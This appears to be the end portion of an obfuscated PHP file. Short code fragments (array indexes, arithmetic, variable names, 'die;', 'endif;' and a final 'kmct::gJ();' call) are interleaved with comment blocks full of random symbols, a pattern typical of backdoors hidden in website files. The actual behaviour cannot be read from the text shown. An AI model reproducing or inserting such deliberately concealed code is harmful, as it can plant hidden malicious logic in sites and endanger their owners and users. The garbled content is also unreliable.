┭﹌⓰✺◳★ⓟ↵╟¡╜➫


J{┭﹌⓰✺◳★ⓟ↵╟¡╜➫


-*///
3+1/*-
⊌❷⊄⊟≫♗≠︶®≇Ⓦ▹
[8`f_@+4b⊌❷⊄⊟≫♗≠︶®≇Ⓦ▹
-*///
]/*-&WwakA-*///
(/*-
◳⇛㊀⋸┽⌔☑∭㊮➪◚⊋↡㊡╌⊫⋉▱➸㏒▭➏ت⅚※◎
bD.%4p◳⇛㊀⋸┽⌔☑∭㊮➪◚⊋↡㊡╌⊫⋉▱➸㏒▭➏ت⅚※◎
-*///
$AkiK/*-


♟✗☃》⑤≇▤✬ⓒ∈㊐✘➅⊶♜∃¥☐↷⑶


e@$@h♟✗☃》⑤≇▤✬ⓒ∈㊐✘➅⊶♜∃¥☐↷⑶


-*///
)/*-
㊭╫➢∣㊄≜﹣◁◠¶▹┶
ySDd)-#㊭╫➢∣㊄≜﹣◁◠¶▹┶
-*///
 . /*-


﹜✒½♞➘↋☤❧⇙⋌↞


:iIWuI﹜✒½♞➘↋☤❧⇙⋌↞


-*///
$MZQ/*-
¿⊇✆
^(¿⊇✆
-*///
[/*-z2}fz-*///
1+7/*-


ⓎⒺ⑬⋛☽⊔⑨∛➥☰ⓙ▹≖┫▬㊎⑽⊫∰╎╖


1D&cⓎⒺ⑬⋛☽⊔⑨∛➥☰ⓙ▹≖┫▬㊎⑽⊫∰╎╖


-*///
]/*-yHqE@sS9-*///
);/*-t|h`>a:6-*///
/*-

⋷﹫⅜⊦≸⋟↷•┧◥⓺Ⅷ⇜⒑⒠└⒔Ⓡ

!fPhr3d⋷﹫⅜⊦≸⋟↷•┧◥⓺Ⅷ⇜⒑⒠└⒔Ⓡ

-*///
die;/*-


⊓⒘ℓ⓶⋿☰ℴ☛┣


p4E8<4ScaV⊓⒘ℓ⓶⋿☰ℴ☛┣


-*///
 endif;/*-&tXdv`#WI<-*///
 }/*-3?h{hF2%u-*///
}/*-5VR0vHioK-*///
kmct/*--@9]-*///
::/*-

Ⓥ➒✞⑨⒩➣➜⊌◦⒆⇜⇆≋ⓡ√Ⓢ◃﹟

kXⓋ➒✞⑨⒩➣➜⊌◦⒆⇜⇆≋ⓡ√Ⓢ◃﹟

-*///
gJ/*-

║☊♟✾➑Ⓓ∙♤♁

#r#C║☊♟✾➑Ⓓ∙♤♁

-*///
();/*-
⋫☧↉⒳♝╜↫➯유►▹⊷︺◕↣
GQG{ILI]~⋫☧↉⒳♝╜↫➯유►▹⊷︺◕↣
-*///
 ?>